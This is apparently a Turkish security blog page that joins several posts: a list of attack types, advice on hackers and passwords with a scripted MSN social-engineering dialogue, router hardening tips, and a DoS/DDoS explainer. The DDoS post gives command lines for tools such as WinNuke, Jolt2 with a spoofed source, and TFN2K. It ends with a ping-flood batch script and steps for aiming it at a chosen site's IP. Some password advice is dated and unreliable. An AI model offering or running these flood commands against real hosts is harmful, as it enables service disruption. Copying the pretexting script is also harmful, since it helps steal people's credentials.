Verizone’un 2009 yılı raporu aşağıdaki 15 tip saldırıyı listeliyor:
1. Tuş kaydetme ve casus yazılımlar: Özel olarak gizlice sistem kullanıcısının işlemlerini izlemek, kaydetmek ve toplamak amacıyla hazırlanmış kötü amaçlı yazılımlar.
2. Arkakapı veya komuta/kontrol: Etkilenen sistemlere uzaktan erişim ve/veya kontrol sağlayan ve gizli çalışan araçlar.
3. Sql İnjection: Web sayfalarının arkaplandaki veritabanları ile haberleşmesindeki açıklardan yararlanan saldırı tekniği.
4. Sistem erişim/haklarının kötüye kullanımı: Bir kuruluşdaki bireylere sunulan kaynakların, erişimin veya hakların kasıtlı ve kötü amaçlı olarak kullanılması.
5. Varsayılan kullanıcı giriş bilgileri yetkisiz erişim: Bir saldırganın bir sisteme veya cihaza önceden belirlenmiş standart kullanıcı adı ve şifreler ile erişimi.
6. Kabul edilebilir kullanım ve diğer politikaların ihlali: Kazara veya kasıtlı olarak kabul edilebilir kullanım politikasına uyulmaması.
7. Zayıf veya hatalı ayarlanmış erişim kontrol listeleri (ACL) ile yetkisiz erişim: ACL’ler zayıf veya hatalı konfigüre edilmişlerse saldırganlar kaynaklara erişip işlem yapabilirler.
8. Paket dinleyici: Ağdan geçen paketleri izlemek ve yakalamak.
9. Çalıntı kullanıcı giriş bilgileri ile yetkisiz erişim: Bir saldırganın bir sistem veya cihaza geçerli fakat çalıntı kullanıcı bilgileri ile erişim kazanması.
10. Kandırmaca veya Sosyal Mühendislik: Bir saldırganın senaryo hazırlayıp hedef kullanıcıyı bir işlem yapması veya bilgi vermesi için ikna etmesi, kandırması.
11. Kimlik doğrulama aşma: Normal kimlik doğrulama mekanizmasını atlatarak sisteme yetkisiz erişim yapılması.
12. Fiziksel mülk hırsızlığı: Bir mülkün fiziksel olarak çalınması.
13. Deneme-yanılma (Brute-force) saldırıları: Geçerli olanları bulana dek otomatik olarak kullanıcı adı ve şifre kombinasyonları denemek.
14. RAM kazıyıcı: Sistemdeki RAM’den (bellek) veri almak için dizayn edilmiş yeni sayılabilecek bir kötü amaçlı yazılım türü.
15. Olta saldırıları (Phishing ve diğer “ishing” son ekli varyasyonları): Saldırganın hedef kullanıcıdan bilgi sızdırmak/çalmak için sahte elektronik haberleşme metodları (genellikle eposta) kullandığı bir sosyal mühendislik tekniği.

Etiketler: Yorum yok
1Nis/110

Internet Korsanları ve Bilgi Guvenliginin Onemi

Günümüz de bilgisayarlar ağlarının güvensizliğinden yararlanarak bilgi hırsızlığı, sahtecilik ve birçok olta oyunu oynanmakta. Gözlemlediğim kadarı ile Türkiye’de kişisel bilgi güvenliğini sağlamak için yeteri kadar bilgilendirme yapılmamaktadır. Meydanı boş bulan internet korsanları (Hacker) bilgi hırsızlığı ve anket amaçlı kullanmak için kişisel bilgilerinizi toplamakta ve firmalara belli bir ücret karşılığı satmaktadırlar ya da kişisel bir hedef haline gelen kurban hakkın da bilgi edinip internet üzerinden çok büyük zararlar verebilirler.

Bir İnternet Korsanı nasıl bir plan üzerin de çalışır inceleyelim;
1-Ön bilgi edinme
2-Tarama
3-Erişim kazanma
•    İşletim sistemi ve ya uygulama düzeyinde
•    Ağ düzeyinde
•    Servis dışı bırakma (Denial Of Service/DOS)
4-Erişimden faydalanma
•    Program ve ya veri indirme
•    Program ve ya veri yükleme/gönderme
•    Sistemde/dosyalarda değişiklik yapma
5-İzleri yok etme

İnternet korsanları kendilerine hedef seçtikleri kurban’ı izlemeye alır ve kurban hakkındaki kişisel bilgileri toplar. Nedir bu kişisel bilgiler? Adınız, Soyadınız, Kimlik No, Okuduğunuz okul, Sınıf/bölüm, Anne adı, Baba adı, Anne kızlık soyadı, Telefon numaranız ve en önemlisi de banka kartı numaranız.(!) Korsanlar gerekli kişisel bilgileri toplamak için en iyi bildikleri strateji yöntemlerini uygularlar.  Aslın da bu yöntemlerden korunmak çokta zor değildir, biz internet kullanıcıları bilgi güvenliğini dikkate almadığımız için hep mağdur duruma düşeriz.

İnternet Korsanları ne gibi yöntemler kullanırlar ?

Virüs;
Bilgisayar virüsleri, bilgisayarın çalışmasını engelleyecek, verileri kaydedecek, bozacak veya silecek ya da kendilerini Internet üzerinden diğer bilgisayarlara yayarak yavaşlamalara veya başka sorunlara neden olacak şekilde tasarlanmış yazılım programlarıdır.

İnsanlara bulaşan virüslerin 24 saatte geçen grip mikrobundan Ebola virüsüne kadar çeşitli türevleri olduğu gibi, bilgisayar virüsleri de muzip virüslerden oldukça zarar verici olanlarına kadar yeni ve çeşitli biçimlerde görülür. Ancak biraz bilgi ve birkaç koruma önlemiyle, virüslere karşı daha az savunmasız olabilir ve etkilerini azaltabilirsiniz.

Not: Bilinen virüslerin hiçbiri bilgisayarınızdaki disk sürücüleri veya monitörler gibi donanımlara zarar verme becerisine sahip değildir. Fiziksel zarar verebilen virüslerle ilgili uyarılar genelde asılsız veya yanlış bilgilerdir.

Virüsler nasıl çalışır?
Temel virüsler genelde yeterli bilgisi olmayan bilgisayar kullanıcıları tarafından farkında olmadan paylaşılır veya gönderilir. Solucanlar gibi daha karmaşık olan virüsler, bir e-posta paylaşma uygulaması gibi diğer yazılımları denetleyerek kendilerini otomatik olarak çoğaltabilir ve diğer bilgisayarlara gönderebilir. Truva atı adı verilen belirli virüsler (adlarını efsanevi Truva Atı'ndan alırlar), faydalı bir program gibi görünerek kullanıcıların aldanıp onları karşıdan yüklemelerine yol açabilir. Bazı Truva atları, beklenen işlemleri yerine getiriyor gibi görünürken bir yandan da sisteminize veya ağa bağlı diğer bilgisayarlara zarar verebilir.

Trojan (Truva atı);
İki kısımdan oluşan ve bilgisayarları uzaktan kumanda etmek amacıyla yazılmış bilgisayar programcıklarıdır.  Trojanlar genel de Arka kapı olarak ta bilinirler. Trojan bilgisayarınıza girdikten sonra  trojanı yazan kodlayıcı tarafından komutlandırılmış işlemleri gerçekleştirir. En önemlisi de uzaktan yönetilmeyi etkin kılan portları açar. Trojanlar çalıştıktan sonra Cookiesleri, Kredi kartı numaranızı, Key loglarınızı, Ekran görüntülerinizi, Dosya bilgilerinizi, Metin dosyalarınızı, Msn vb. gibi internet üzerinden çalışan iletişim programlarının şifrelerini ve en önemlisi bilgisayarınız da klavye ile gerçekleştirdiğiniz her işlemi İnternet Korsanına iletir.

Spam;
İnternet üzerinde aynı mesajın yüksek sayıdaki kopyasının, bu tip bir mesajı alma talebinde bulunmamış kişilere, zorlayıcı nitelikte gönderilmesi Spam olarak adlandırılır. Spamlar genel de internet reklamcılığı kısmın da daha çok yaygındır. İnternet Korsanları istenmeyen postalar yolu ile bilgisayarınıza trojan, solucan girmesini sağlayarak kişisel bilgilerinize ulaşabilir size zarar verebilirler.

Phishing;
Bankanızın, e-postanızın veya bunun gibi bilgi girmenizi gerektiren bir kuruluşun web sayfasının bir kopyasını yapıp kullanıcısının hesap bilgilerini çalmayı amaçlayan fake sayfa diye de adlandırabileceğimiz arka plan bilgi çalma yöntemidir. İngilizce "Balık tutma" anlamına gelen "Fishing" sözcüğünün 'f' harfinin yerine 'ph' harflerinin konulmasıyla gelen terim, oltayı attığınız zaman en azından bir balık yakalayabileceğiniz düşüncesinden esinlenerek oluşturulmuş ve uygulanıyor.
Örneğin;  kullandığınız elektronik posta servisinin giriş ekranının bir kopyası elektronik posta olarak geliyor ve bir şekilde kullanıcı adınızı ve şifrenizi girmenizi istiyor. Dikkatsiz bir şekilde bilgileri verdiğinizde, sayfanın içine gizlenmiş bir kod parçası kullanıcı adınızı ve şifrenizi İnternet korsanına iletiyor.

Not: Phishing yöntemi kullanarak bilgisayar kullanıcılarını tuzaklarına düşüren dolandırıcılar, özellikle Kredi, Debit/ATM Kart Numaraları/CVV2,  Şifrelerinizi, Hesap Numaralarınızı,  İnternet Bankacılığına Girişte Kullanılan Kullanıcı Kodu ve Şifrelerinizi phishing yöntemi ile İnternet korsanları bu bilgileri elde edebiliyorlar.

Sosyal Mühendislik;
Etkilemek liderlik davranışıdır. Sosyal Mühendis dediğimiz kişiler (Toplum Mühendisleri) Lider kişilik özelliklerine sahip kişilerdir. İnternet korsanları bu yöntemi farklı şekiller de kullanmaktadırlar.. Korsanlar başka bir kimliğe bürünerek sizinle sohbet ederler ve gerekli bilgileri sohbet esnasın da toplarlar.

Msn üzerinden bir Sosyal Mühendislik örneği verecek olursak küçük bir konuşma senaryosu oluşturalım;

Msn kişi listenize eklenmek üzere bir ekleme talebi gelir..

korsan@hotmail.com sizi kişi listesine eklemek için davet ediyor (kabul ettiniz)

Korsanın adı: Mert,  Kurbanın adı: Hülya olsun..

Korsan: Merhabalar Hülya ben Pamukkale üniversitesi işletme bölümünden Mert..
Kurban: Merhaba ben Hülya size nasıl yardımcı olabilirim?

Korsan: Rahatsız ettiğim için çok üzgünüm.. İstatistik programı hakkın da senden bilgi alabilirliyim?
Kurban: Olabilir tabii ki.

Korsan: Bu arada çok özür dilerim tanışamadık, Ben Mert söz ettiğim gibi işletme bölümü okuyorum bu sene dersler çok ağır..
Kurban: Ben Hülya Pamukkale Üniversitesinde okuyorum.. Bu arada msn adresimi nerden aldını öğrenebilirliyim Mert.

Korsan: Pamukkale Üniversitesi Organizasyon toplantısından almıştım iktisat okudunu görünce yardımcı olabileceğini düşündüm. Not aldım..
Kurban: Tamam pek inandırıcı olmadı ama neyseh..
Kurban:  Tamam bir makale var elim de paylaşabilirim bir dakika beklermisin ?
Korsan: Tabiki.

Birkaç dk geçer aradan..

Kurban: Mert tamam dosya burada yolluyorum hemen inşallah yardımcı olabilmişimdir..
Korsan: Sağ ol bulmak istediğim makale buydu.
Kurban: Hiç önemli değil yardım edebildiysem ne mutlu bana.
Korsan: Teşekkürler Hülya, Allah razı olsun, sende olmasan kimse yardımcı olamayacak
Kurban: Hiç Önemli değil her zaman yardım ederim J
Korsan: Şimdilik bana müsaade her şey için teşekkür ederim.. Allah razı olsun.
Kurban: İyi günler Mert görüşmek üzere.

… der ve Korsan ertesi gün planlarını yoluna koyar.. Korsan için gerekli bilgiler okul numarası ve kimlik numarasıdır.  Korsan burada ön tanışmayı gerçekleştirmiş ve akıcı konuşması ile kurbandan bilgi sızdırmak için gerekli ön  tanışmayı sağlamıştır.

Ertesi gün kurban yine msn adresini açar ve size selam verir..

Korsan: Merhaba Hülya ne haber..
Kurban: Hoş geldin Mert iyiyim çok şükür, senden ne haber makale işini gördümü?

Korsan: Evet sanırım geçicem hoca olumlu dedi, Çok sağol Hülya sende olmasan ne yapardım bilmiyorum. Hülya notlar sayfasına ulaşamıyorum galiba kullanıcı adım engellenmiş bir bakarmısın sorun bendemi yoksa sitede mi?

Kurban: Tamam bakıyorum.. bir dakika.
Kurban: Sende sorun var ya adın engellenmiş herhalde..
Korsan: Tamam senin adın üzerinden girip bakabilirmiyim?
Kurban: Tabi şifre: sekerkiz20 kullanıcı adı: hülya07

(Kişi bilgisiz olunca şifresini kendi elleri ile teslim ediyor)

Arkadaşlar notlar sayfasında sizin ile ilgili kişisel bilgiler özeti bulunmaktadır ve korsan amacına ulaşmıştır. Kurban aynı okuldan sandığı Korsana güvenerek şifresini vermiştir, fakat korsan sadece sosyal mühendislik yapmış ve kendi bilgilerini paylaşmamıştır. Amacına uygun planlamayı yapan korsan planını uygulamaya koyduktan 2 gün sonra amacına ulaşmıştır. Bu ikili arasında geçen konuşma kimlik bilgilerine ulaşmanın en kolay yolu stratejisini  uygulayarak korsan gerekli bilgilere ulaşmıştır.

Korsan ulaştığı bilgiler ile sahte kredi kartı düzenleyerek ve kimlik cüzdanı düzenleyerek  üzerinizden kredi kartı başvurusu yapabilir, kimliğiniz üzerinden alışveriş yapabilir ve başka amaçları için kullanabilir.

 

İnternet Korsanından (Hacker) korunmanın yolları:

  • Bilgisayarınız da güncel bir anti virüs programı kurulu olmalıdır.
  • Güvenli olduğundan emin olmadığınız internet sitelerine girmeyiniz.
  • Tanımadığınız kişiler ile sohbet etmeyiniz, dosya paylaşımın da bulunmayınız.
  • Msn deki kullanıcı adı ve parola kısmını kayıtlı bırakmayınız.
  • Ortak ağlar da bilgisayarınızı paylaşıma kapatınız ve zorunlu olmadıkça bilgisayarınızı ortak ağlara erişime izin vermeyiniz.
  • Msn şifre kırıcı, bilgisayara gir gibi makalelerin tamamı sosyal mühendislik üzerine kurulu olup sizi oltaya düşürmek için sitede paylaşılmıştır. Güvenliğinden emin olmadığınız sitelerden bilgi alışverişi yapmayınız.
  • Kablosuz internet kullanıyorsanız WPA2 statüsün de şifreleyiniz ve SSID kullanıcı adını gizleyiniz.
  • Güvenli olmayan kablosuz ağlara girmeyiniz. Unutmayın ki ağ üzerinden bilgi sızdırmak çok daha kolaydır.
  • Forum, blog vb. sitelerdeki kullanıcı adını kayıtlı bırakmayınız.
  • Msn şifrenizi, kredi kartı numaranızı, kimlik numaranızı ve kişisel bilgilerinizi kimse ile paylaşmayınız.
  • Uzun ve Karışık değil, Güçlü şifreler yaratın!
    Önemli olan uzun yada karışık şifreler üretmek değil, güçlü şifreler üretmektir.  Bunun için şifrenizin ;  En az 4 en çok 16 karakter aralığında olması, Harf – Rakam – Sembol barındırması, Ortalama 4 harf, 2 rakam ve 2 de sembol kullanılan toplamda 8 karakterli şifre üretilmesi güvenli olur.

Kırılmaz, Güvenli şifreler yaratırken neler yapmamalıyız?

ü  Oluşturduğunuz parolayı,  başta bilgisayarınız olmak üzere hiçbir yere not etmeyiniz.
(Ajanda, not defteri dâhil)

ü   İşiniz icabı farklı yerlere sürekli kayıt olarak, şifre girmeniz gerekiyorsa devamlı olarak birbirinden bağımsız şifreler kullanın.

ü   Eşinizin, sevgilinizin, çocuklarınızın ya da birinci dereceden yakınlarınızın isimlerini şifreleriniz olarak tercih etmeyin.

Not: Şifrenin güvenliği uzunluğuna göre değil, karakteristik kodlanmaya dayanır.

1Nis/110

ADSL Yonlendirici Guvenligi

Bu yazıda yaygın olarak kullanılan ADSL yönlendiricileri (ADSL modem olarakta bilinirler) güvenli hale getirme yolları hakkında bilgi verilmiştir.
Kişisel bilgi güvenliği günümüzde çok önemli hale gelmiştir. Bilgisayarımızda farkında olmasak da çok fazla kişisel bilgi bulunduruyoruz. Banka hesap şifreleri, e-posta hesap şifreleri, özlük bilgileri, vs. gibi kişisel bilgilerimizi sürekli İnternet’te kullanıyoruz. Güvenliği sağlanmamış bir ADSL yönlendirici üzerinden İnternet’e çıkılması bu bilgileri tehlikeye atmaktadır.

ADSL hattımızın başkaları tarafından kullanılmasının engellenmesi gereklidir. Çünkü ADSL hatları üzerinden yapılacak her türlü işlemden hattın resmi sahibi sorumludur. 5651 numaralı Türk Ceza kanununda İnternet’in ortak kullanım şartları ve ADSL kullanıcılarının 3. şahıslara İnternet hizmeti verme koşulları belirlenmiştir. Bu şartlar sağlanmadan İnternet bağlantısının bir başkasına kullandırılması durumunda, bu bağlantı üzerinden yapılacak işlemlerden hattın sahibi sorumlu tutulur.

ADSL yönlendiricilerin güvenliğini sağlamak için dikkat edilmesi gerekilen noktalar şu şekilde sıralanabilir:

1. ADSL Bağlantısının İzinsiz/Ortak Kullanılması ADSL bağlantısının başkalarıyla ortak kullanılması her ne kadar zararsız olarak düşünülse de, aslında çok tehlikelidir. İnternet hızının düşmesi ve kota aşımı sonucu hat sahibine yüksek faturalar gelmesi ADSL bağlantısını bir başkasının kullanmasında ilk ortaya çıkan zararlardır. ADSL bağlantısını bir başkasının kullanması durumunda, hat sahibi bu hat üzerinden gerçekleştirilen yasaklı ve zararlı içerik barındıran sitelere girilmesi, diğer bilgisayarlara saldırı yapılması, vs. gibi suç teşkil eden faaliyetlerden sorumlu tutulabilir. ADSL hattının resmi sahibinin, ADSL bağlantısını yasal ve teknik risklerinden dolayı ortak kullandırmaması tavsiye edilmektedir. Ayrıca ADSL hattı sahibi ADSL yönlendiricisine izinsiz yapılacak bağlantı isteklerini engellemek için gerekli önlemleri almalıdır.

2. Kablosuz iletişim
Kablosuz yayın yapan ADSL yönlendiricilerde, bilgisayar ile ADSL yönlendirici arasındaki iletişimin çevredeki şahıslar tarafından dinlenilmesi mümkündür. Kablosuz yayında iletişim hava yolu ile yapıldığından, yani fiziksel olarak iletişimi kontrol edemediğimizden dolayı kablosuz ADSL yönlendirici ile yapılan iletişimi dinleyen bir saldırganın İnternet’te yapılan işlemleri görmesi, e-posta ve banka hesap şifreleri gibi kişisel bilgileri ele geçirmesi mümkündür. Bunun yanında bilgisayar ile ADSL yönlendirici arasında giden verileri değiştirerek İnternet kullanıcısını yanlış yönlendirmesi de mümkündür. Bu soruna çözüm olarak saldırganın iletişimi anlamaması için iletişimin şifrelenmesi yoluna gidilmiştir. Kablosuz iletişim için geliştirilen ilk şifreleme algoritması olan WEP algoritmasının zayıflığından dolayı ve kısa sürede kırılabildiği için güvenli değildir. Şifreleme algoritması olarak WEP’in kolayca kırılabilmesinden dolayı geliştirilen, daha güçlü algoritmaları olan WPA-WPA2 algoritmaları kullanılmalıdır.

Kablosuz ADSL yönlendiriciler çevrelerindeki cihazlara varlıklarını bildirmek için kendilerini tanımlayan SSID adında bir bilgi gönderirler. Bir bilgisayarın kablosuz ADSL yönlendirici ile iletişim kurabilmesi için yönlendiricinin SSID’sini bilmesi gerekir. SSID’lere ön tanımlı (default) değerlerinden başka değerler verilmelidir. Çünkü SSID’si ön tanımlı olan bir ADSL yönlendirici, başta model bilgisi olmak üzere kendisi hakkında birçok bilgi verir. Bunun yanında SSID, şifreleme algoritmalarının içinde kullanıldığı için ön tanımlı değerlerle yapılan şifreleme daha zayıf olacaktır.

SSID gizlenerek, yani otomatik SSID gönderimi kapatılarak, çevredeki bilgisayarların kablosuz ADSL yönlendiriciyi görmesi engellenebilir. Buna rağmen çevredeki gizlenmiş kablosuz yönlendiricileri bulmak için geliştirilmiş yöntemler mevcuttur. Aktif olarak çevredeki kablosuz ADSL yönlendiricileri tarayan saldırganlara karşı tam bir önlem sağlanamasa bile SSID’nin gizlenmesi çevredeki birçok bilgisayar kullanıcısını ADSL yönlendiriciden uzak tutar.

3. Web Yönetim Arayüzü

ADSL yönlendiricileri yönetmek için kullanılan yönlendirici web yönetim arayüzlerinin ön tanımlı olarak gelen şifreleri değiştirilmelidir. Birçok ADSL yönlendirici için ön tanımlı olarak gelen “web” yönetim arayüzü şifreleri İnternet’te basit bir araştırma yapılarak bulunabilmektedir. Ulusal Bilgi Güvenliği Kapısında yapılan bir araştırmaya göre [1] , Türkiye çapında belli sayıda IP taranmış, 80. TCP portu (HTTP) açık olan, yani web yönetim arayüzü İnternet’e açık olan belli model ADSL yönlendiricilerin %46’sında şifrelerin hiç değiştirilmemiş olduğu keşfedilmiştir. Yani taranan ADSL yönlendiricilerde web yönetim arayüzü İnternet’e açık olanların yarısına ön tanımlı şifreler kullanılarak bağlanılabileceği ortaya konulmuştur.

4. Kullanılmayan servisler
ADSL yönlendirici üzerindeki FTP, SNMP, ICMP, Telnet ve HTTP gibi servisler kullanılmadıkları takdirde kapatılmalıdır. ADSL yönlendiriciye İnternet üzerinden erişim yani tüm dış ağ servisleri kapatılmalıdır. ADSL yönlendiriciye bağlanmak için sadece kullanıcının bilgisayarına erişim hakkı verilmelidir.

5. Güvenlik Duvarı ADSL yönlendiricilerde güvenlik duvarı aktif hale getirilmelidir. Güvenlik duvarı İnternet’ten gelen yetkisiz bağlantı isteklerini engeller. IP ve port bazında erişim kontrolü sağlayarak ADSL yönlendiriciye izinsiz erişime engel olur.

6. MAC Adres Filtrelemesi
ADSL yönlendiriciye bağlanabilecek bilgisayarları kısıtlamak için MAC adres filtrelemesi uygulanmalıdır. MAC adresleri İnternet’e bağlanan her cihaz için benzersiz olarak üretilen numaralardır. ADSL yönlendiriciye bağlanabilecek MAC adresleri tanımlanarak yönlendiriciye sadece istenilen bilgisayarların erişimi sağlanmış olur.

Kısaltmalar:
ADSL: Asymmetric Digital Subscriber Line

MAC: Media Access Control

SSID: Service Set IDentifier

WEP: Wired Equivalent Privacy

WPA: Wi-Fi Protected Access

FTP: File Transfer Protocol

ICMP: Internet Control Message Protocol

SNMP: Simple Network Management Protocol

HTTP: HyperText Transfer Protocol

1Nis/110

DDoS atakları Nedir?

DDoS atakları Nedir?

Bir saldırgan daha önceden tasarladığı BİR ÇOK makine üzerinden hedef bilgisayara saldırı yaparak hedef sistemin kimseye hizmet veremez hale gelmesini amaçlayan bir saldırı çeşididir.

Koordineli olarak yapılan bu işlem hem saldırının boyutunu artırır hem de saldırıyı yapan kişinin gizlenmesini sağlar. Bu işlemleri yapan araçlara Zombi denir.
Bu saldırı çeşidinde saldırganı bulmak zorlaşır.

Çünkü saldırının merkezinde bulunan saldırgan aslında saldırıya katılmaz. Sadece diğer ip numaralarını yönlendirir.Eğer saldırı bir tek ip adresinden yapılırsa bir Firewall bunu rahatlıkla engelliyebilir. Fakat saldırı daha yüksek sayıdaki ip adresinden gelmesi Firewall un devre dışı kalmasını sağlar(Log taşması firewall servislerini durdurur).İşte bu özelliği onu DoS sadırısından ayıran en önemli özelliğidir.

================================================== ======

DoS Ataklarının Türleri?

Service Overloading: Bu atak tipi belirli host ve servisleri düşürmek için kullanılır. Atak yapan kişi özel port ve host a bir çok ICMP paketi gönderir.Bu olay network monitör ile kolayca anlaşılır

Message flooding: Service Overloading den farkı sistemin normal çalışmasını engellemez. Yine aynı şekilde gönderilen paketler bu sefer normal olarak algılanır. Örnek Nis serverında flood yapılırsa (Unix network) Nis bunu şifre şifre isteği gibi görür. Ve saldırganın host a hükmetmesi sağlanır.

Clogging: Saldırganın SYN gönderip ACK alıp ondan sonrada gelen ACK ya cevap vermeyip sürekli syn göndermesinden oluşur. Bu durum defalarca kez tekrarlanırsa server artık cevap veremez hale gelir. Bu paketler sahte ip ile gönderildiğinden sistem bunu anlayamaz ve hizmeti keser. Anlasa ne olur, anlasa aynı ip den gelen o kadar istege cevap vermez. Kurtuluş yolu bunları tarayan firewall lardır.

DoS Atakları için kullanılan programlar?

Ping Of Death
Bir saldırgan hedef aldığı bir makineye büyük ping paketleri gönderir. Birçok işletim sistemi gelen bu maksimum derecede paketleri anlayamaz, cevap vermez duruma gelir ve işletim sistemi ya ağdan düşer ya da çöker.
SSPing
SSPing bir DoS aracıdır.SSPing programı hedef sisteme yüksek miktarda ICMP veri paketleri gönderir. İşletim sistemi bu aldığı data paketlerini birbirinden ayırmaya çalışır.Sonuç olarak bir hafıza taşması yaşar ve hizmet vermeyi durdurur.

Land Exploit
Land Exploit bir DoS atak programıdır. TCP SYN paketiyle hedef sisteme saldırıdır. Saldırı aynı port numarasına sürekli olarak yapılır. Land Expoit aynı kaynak ve hedef portları kullanarak SYN paketleri gönderir.
Bir Çok Makine bu kadar yüklenmeyi kaldıramayacağı için Buffer overflow yaşar ve hiçbir bağlantıyı kabul edemeyecek duruma gelir.

Smurf
Smurf broadcast adreslere ICMP paketleri gönderen bir DoS Saldırı programıdır.Saldırgan ICMP echo istekleri yapan kaynak adresi değiştirerek ip broadcast a gönderir. Bu broadcast network üzerindeki her makinenin bu istekleri almasına ve her makinenin bu sahte ipli adrese cevap vermesini sağlar.Bu sayede yüksek seviyede network trafiği yaşanır. Sonuç olarak bir DoS saldırısı gerçekleşmiş olur.
Bir TCP bağlantısının başında istekte bulunan uygulama SYN paketi gönderir. Buna cevaben alıcı site SYN-ACK paketi göndererek isteği aldığını teyit eder. Herhangi bir sebeple SYN-ACK paketi gidemezse alıcı site bunları biriktirir ve periyodik olarak göndermeye çalışır.
Zombilerde kullanılarak, kurban siteye dönüş adresi kullanımda olmayan bir IP numarası olan çok fazla sayıda SYN paketi gönderilirse hedef sistem SYN-ACK paketlerini geri gönderemez ve biriktirir. Sonuçta bu birikim kuyrukların dolup taşmasına sebep olur ve hedef sistem normal kullanıcılarına hizmet verememeye başlar.

WinNuke
WinNuke programı hedef sistemin 139 nolu portuna “out of band” adı verilen verileri gönderir. Hedef bunları tanımlayamaz ve sistem kilitlenir.
Kullanımı
WNUKE4 -c XXX.com 10000 0 450
(hedefe 10,000 adet 450 byte lık icmp paketleri gönderir.)
WNUKE4 -n XXX.com 0 1024-2024 6667-6668 UNPORT

Jolt2
Jolt2 kendisini farklı segmentte bulunuyormuş izlenimi vererek NT/2000 makinelere DoS atak yapabilen bir programdır. İllegal paketler göndererek hedefin işlemcisini %100 çalıştırıp kilitlenmesine yol açar.
c: \> jolt2 1.2.3.4 -p 80 4.5.6.7
Komut satırında görülen, 1.2.3.4 ip numarası saldırganın spoof edilmiş adresidir. Hedef adresin 4.5.6.7 80 nolu portuna saldırı yapar.
CPU kaynaklarını tamamını harcar ve sistemi aksatır

Bubonic.c
Bubonic.c Windows 2000 makineleri üzerinde DoS exploit lerinden faydalanarak çalışan bir programdır.
Hedefe düzenli olarak TCP paketlerini gönderir.
c: \> bubonic 12.23.23.2 10.0.0.1 100

Targa
Targa 8 farklı modül içinde saldırı yapabilen bir Denial of Service Programıdır.
================================================== =======

DDoS Atakları için kullanılan programlar?
1.Trinoo
2.TFN
3.Stacheldraht
4.Shaft
5.TFN2K
6.mstream
================================================== =======

DDOS – Saldırı Yöntemi

Tüm DDoS programları iki safhada çalışır.
Mass-intrusion Phase – Bu safhada DoS saldırısı yapacak olan sistemlere ulaşılır ve saldırıyı gerçekleştirecek olan programlar yüklenir. Bunlar birincil kurbanlardır.
DDoS Attack Phase – Bu safhada hedef sitelere saldırı yapılır bunun içinde birincil kurbanlar kullanılarak hedefe yüklenilir.

Trinoo
Trinoo DDoS yöntemini kullanan ilk programdır.
Kullandığı TCP Portları:
Attacker to master: 27665/tcp
Master to daemon: 27444/udp
Daemon to master: 31335/udp

TFN2K
Zombilerin yüklendiği makineler listening modda çalışır. Her an karşıdan gelecek komutlara hazırdır.
Running the server
#td
Running the client
#tn -h 23.4.56.4 -c8 -i 56.3.4.5 bu komut 23.4.56.4 nolu ipden 56.3.4.5 nolu ip ye saldırı başlatır.

Stacheldraht
TFN ve Trinoo gibi çalışır fakat modüllerine paketleri kriptolu gönderebilir.
Kullandığı portlar TCP ve ICMP
Client to Handler: 16660 TCP
Handler to and from agents: 65000 ICMP

@echo off
set count=
:loop
set count=%count%x
start /b ping ip -l 65500 -n 30
if not "%count%"=="xxxxxxxxxxxxxxxxxxxx" goto loop
:end

yukaridaki kodun icinde bulunan "ip" kismina saldiri yapmak istediginiz sitenin ip numarasini yazarsaniz. sonrasinda bu kod'u note pade'e ( not defteri ) yapistirip dosya adini "joker.bat" olarak kaydederseniz. basit bir ddos mantigini bilgisayarinizda joker.bat dosyasina cift tiklayarak calistirabilirsiniz.

Incoming search terms:

land exploit indirland exploitland exploit downloadwinnuke downloadsmurf saldırısıwinnuke
Copy Protected by Chetan's WP-Copyprotect.